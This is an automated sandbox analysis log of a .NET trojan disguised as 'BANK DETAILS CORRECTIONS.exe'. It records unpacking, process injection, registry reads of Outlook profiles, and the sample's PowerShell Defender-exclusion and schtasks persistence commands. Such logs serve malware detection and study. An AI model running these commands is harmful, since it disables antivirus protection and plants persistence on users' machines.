                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, ivtNue3aMakjbVsfus.csCryptographic APIs: 'CreateDecryptor'
                Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, ivtNue3aMakjbVsfus.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, fe1LJPaDf5VFXiQOsV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, fe1LJPaDf5VFXiQOsV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7660000.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dfaee8.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: 13.2.fcLfLlfpmjf.exe.28caec8.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/16@17/14
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeFile created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMutant created: \Sessions\1\BaseNamedObjects\ilxsEXzxkgHfQTaf
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB1A6.tmpJump to behavior
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: BANK DETAILS CORRECTIONS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: BANK DETAILS CORRECTIONS.exeReversingLabs: Detection: 71%
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeFile read: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmpJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeJump to behavior
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exeJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: firefox.pdbP source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnKifmZDGZ.exe, 00000011.00000002.3731777625.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383056576.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3731787865.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: hBWP.pdbSHA256 source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
                Source: Binary string: wntdll.pdb source: BANK DETAILS CORRECTIONS.exe, BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdb source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hBWP.pdb source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
                Source: Binary string: firefox.pdb source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdbGCTL source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: BANK DETAILS CORRECTIONS.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: fcLfLlfpmjf.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.cs.Net Code: uicrufJqQL System.Reflection.Assembly.Load(byte[])
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.cs.Net Code: uicrufJqQL System.Reflection.Assembly.Load(byte[])
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: 0x9354E9B9 [Wed Apr 29 23:26:49 2048 UTC]
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_0135F1B0 push eax; iretd 0_2_0135F1B1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_0135756A push eax; iretd 0_2_01357589
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076D3932 pushad ; retf 0_2_076D3939
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0042F052 push eax; ret 12_2_0042F054
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_004020F2 pushad ; retf 12_2_004020F8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00414893 push esi; ret 12_2_0041489E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_004248A3 push es; ret 12_2_00424A38
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00407397 push ecx; ret 12_2_0040739A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00403600 push eax; ret 12_2_00403602
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040773B push esp; retf 12_2_00407743
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019209AD push ecx; mov dword ptr [esp], ecx12_2_019209B6
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04BC756A push eax; iretd 13_2_04BC7589
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04D238F0 pushad ; iretd 13_2_04D238F1
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04D23938 pushfd ; iretd 13_2_04D23939
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F83932 pushad ; retf 13_2_06F83939
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155C54D pushfd ; ret 20_2_0155C54E
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155C54F push 8B014E67h; ret 20_2_0155C554
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155C9D7 push edi; ret 20_2_0155C9D9
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015109AD push ecx; mov dword ptr [esp], ecx20_2_015109B6
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_014E135E push eax; iretd 20_2_014E1369
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_014E1FEC push eax; iretd 20_2_014E1FED
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01567E99 push ecx; ret 20_2_01567EAC
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: section name: .text entropy: 7.989685826785
                Source: fcLfLlfpmjf.exe.0.drStatic PE information: section name: .text entropy: 7.989685826785
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GG7nVgzOMgaselTNE0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cqkMh0MTH7', 'ggdMNbLgOI', 'wYkMOA74ln', 'f91M3wd2tP', 'AmKM4sZhm7', 'ofgMMii10j', 'HADMCpSTM8'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, fe1LJPaDf5VFXiQOsV.csHigh entropy of concatenated method names: 'alrQFt7ZGd', 'uocQHW47Hc', 'QiSQXYcVVQ', 'qHrQi2DqjD', 'PK2Qditl6S', 'qZLQ5YdwG5', 'uTrQso3aCB', 'ACoQJrp8Rf', 'L0HQZ0Fg8x', 'fioQBRhQJo'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, NDGepILwqTm6MvrIFB.csHigh entropy of concatenated method names: 'IX2PtPq3Ss', 'pc0PQ7Edjj', 'KrTPq0c1NE', 'mAePgPaIQx', 'On6P0AkwRT', 'zvJqd7Tq0G', 'r9Xq5vRFGU', 'DMfqsFANZR', 'mGKqJCgI5J', 'hIPqZ3t3jg'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, NhDsL8vRyZnHlsuYsp.csHigh entropy of concatenated method names: 'Ar4gyBxmJZ', 'ijWgGXjE1D', 'e2rguJHEoa', 'JMlgIpn7mt', 'LIZgbt0AvZ', 'umag21NAdd', 'DXbgYCuYjY', 'Yynga54LPv', 'BPvgwmqsOk', 'RRAgR1iZdT'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, Gy0jjk5J26QyualQui.csHigh entropy of concatenated method names: 'c023JgDrXb', 'Rj23BsMrTY', 'UPq4SS5PWC', 'LZc4UGeTUP', 'Dqy3efDlmw', 'RYh3ojI0IF', 'Un63Kg1shC', 'Isr3FsTy29', 'Ury3HAxpRR', 'ceu3XuX8gr'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, lIpPJ8WMDhjobULOpe.csHigh entropy of concatenated method names: 'RHJPlKxwrO', 'GCqPy6XpsY', 'lfrPudfy3g', 'Tl3PIgWPYt', 'FRhP2N8rko', 'j9dPYH3unI', 'Q2hPwxaomK', 'KBfPRVlrLM', 'vWPjnSbhqhGc0xAMmlY', 'D6g6gEb7GGi6LLB8D4K'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, kNmsS0KwVwTBc9gu2d.csHigh entropy of concatenated method names: 'iBBha6ZBG6', 'sYshwVKNyR', 'PrnhLKeFge', 'mZEh7g34Rq', 'XgChWfy86h', 'W7WhDj4LSP', 'hOHhmgYbEf', 'PPRhk7SPQw', 'uEIh9BPucu', 'o1uheiRwue'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, Y5i6UvwKpce67ZwFXg.csHigh entropy of concatenated method names: 'fKijINmgS7', 'J8bj2wigDS', 'PJhjaZqBhA', 'uWpjwOwrrX', 'o5ujNHaZX0', 'PIMjOvlNae', 'RwWj3MPIF3', 'gnZj4D8nw1', 'trfjMXxBwb', 'UF7jCFKMT8'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, zkZxIGU8FXukaMxFsYS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vrNCFvDmu1', 'UwECH36clI', 'gG3CXx5ORb', 'V7fCimQbwL', 'a3TCdlVqtS', 'ay3C5hBJbZ', 'SbACsja15L'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, eY2qJaimXSGow5DTwb.csHigh entropy of concatenated method names: 'XAi3fO9gR8', 'Yhw3VXTGMO', 'ToString', 'I8G3T1fS3E', 'Djl3Qd9ust', 'QS33jR5ARB', 'c4Z3q5hNYX', 'z4G3PXxxvw', 'baQ3gybulI', 'FRu30rb9pR'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, C6DfDTZCXSi0UbmT5J.csHigh entropy of concatenated method names: 'UNg4L2axuh', 'a1847dLF7q', 'Lx546eIrQN', 'sCX4W7umGD', 'j194Fyu63b', 'Iy84D7U7Bk', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, sHDcKABKKVrFxJInf4.csHigh entropy of concatenated method names: 'HIlMUZOIph', 'fvbM8C7doV', 'WmKMrlUuQu', 'koRMT1cYQF', 'C0NMQKjhKD', 'UWLMq1RqqK', 'nXRMPyHgwU', 'Upg4sG229F', 'VX04JTfd68', 'l4J4ZCHBcN'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, OwIOThAf7ZaP1hFQg0.csHigh entropy of concatenated method names: 'gSCuHptTN', 'uRPIQfPph', 'mAv2rFl3M', 'vSAY2XJxL', 'b5Xw0gZKm', 'us5RKKQOc', 'kIjA9blJxRok7EK24L', 'VoZeSJ1hNLMEl8Lfwx', 'oq74Ue4VJ', 'LEcC3icxS'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, TAQxmwJtyBvqQpMdNN.csHigh entropy of concatenated method names: 'hCP4TJYgi5', 'Iay4Q8naDZ', 'qYb4jAQ6fl', 'O0A4q5fCGn', 'PdP4PW1QaJ', 'CvR4g9C3oI', 'McZ40ElrxB', 'mUS4cm6eZr', 'CDf4fATbwr', 'Yh04Vt0p1N'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, WIZChgQigwGrZrhkVl.csHigh entropy of concatenated method names: 'Dispose', 'KpBUZ1W8nU', 'odQA7VM81H', 'aXw449TYvv', 'MiAUBQxmwt', 'xBvUzqQpMd', 'ProcessDialogKey', 'oNYAS6DfDT', 'tXSAUi0Ubm', 'f5JAACHDcK'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.csHigh entropy of concatenated method names: 'mbl8top0Cw', 'gaB8TQESAl', 'T6N8Qvi0rX', 'r4T8jqlmEV', 'CP78qSC7kM', 'qBA8PmrOiQ', 'ile8gCpbAB', 'cbM802eaVH', 'kAL8cOY0ja', 'IjJ8fLeGDx'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, zlkrqTUSCeJO6SjsTBn.csHigh entropy of concatenated method names: 'sXGMyQM1nd', 'ClqMGtMjA2', 'b95MuetAx3', 'PyJMIUuqSi', 'mwOMbcbDFG', 'awnM26Zfrs', 'To8MYWa83J', 'AuTMaZSmZg', 'uBmMwtSUSB', 'N9HMRFgaB5'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, OectpLryIkurccAY12.csHigh entropy of concatenated method names: 'cQTUge1LJP', 'Jf5U0VFXiQ', 'MKpUfce67Z', 'EFXUVgPBSj', 'GcTUNSO9DG', 'OpIUOwqTm6', 'vjxVdY2JUkSAmoCshy', 'McOGQ73DKphXvybRTN', 'I28UUn4qqB', 'j4rU8293Ih'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, k2HUP0FNHjHWySwOx9.csHigh entropy of concatenated method names: 'SnkN98wOjd', 'TYHNossVpf', 'G1FNFnbYXq', 'hGsNH4s6Vm', 'cNrN7rHAdY', 'MCRN6NvH9s', 'JhcNWfYYfA', 'AyyND7lQJ4', 'bQCNpYZSdm', 'NpgNmq7ypl'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GG7nVgzOMgaselTNE0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cqkMh0MTH7', 'ggdMNbLgOI', 'wYkMOA74ln', 'f91M3wd2tP', 'AmKM4sZhm7', 'ofgMMii10j', 'HADMCpSTM8'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, fe1LJPaDf5VFXiQOsV.csHigh entropy of concatenated method names: 'alrQFt7ZGd', 'uocQHW47Hc', 'QiSQXYcVVQ', 'qHrQi2DqjD', 'PK2Qditl6S', 'qZLQ5YdwG5', 'uTrQso3aCB', 'ACoQJrp8Rf', 'L0HQZ0Fg8x', 'fioQBRhQJo'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, NDGepILwqTm6MvrIFB.csHigh entropy of concatenated method names: 'IX2PtPq3Ss', 'pc0PQ7Edjj', 'KrTPq0c1NE', 'mAePgPaIQx', 'On6P0AkwRT', 'zvJqd7Tq0G', 'r9Xq5vRFGU', 'DMfqsFANZR', 'mGKqJCgI5J', 'hIPqZ3t3jg'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, NhDsL8vRyZnHlsuYsp.csHigh entropy of concatenated method names: 'Ar4gyBxmJZ', 'ijWgGXjE1D', 'e2rguJHEoa', 'JMlgIpn7mt', 'LIZgbt0AvZ', 'umag21NAdd', 'DXbgYCuYjY', 'Yynga54LPv', 'BPvgwmqsOk', 'RRAgR1iZdT'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, Gy0jjk5J26QyualQui.csHigh entropy of concatenated method names: 'c023JgDrXb', 'Rj23BsMrTY', 'UPq4SS5PWC', 'LZc4UGeTUP', 'Dqy3efDlmw', 'RYh3ojI0IF', 'Un63Kg1shC', 'Isr3FsTy29', 'Ury3HAxpRR', 'ceu3XuX8gr'
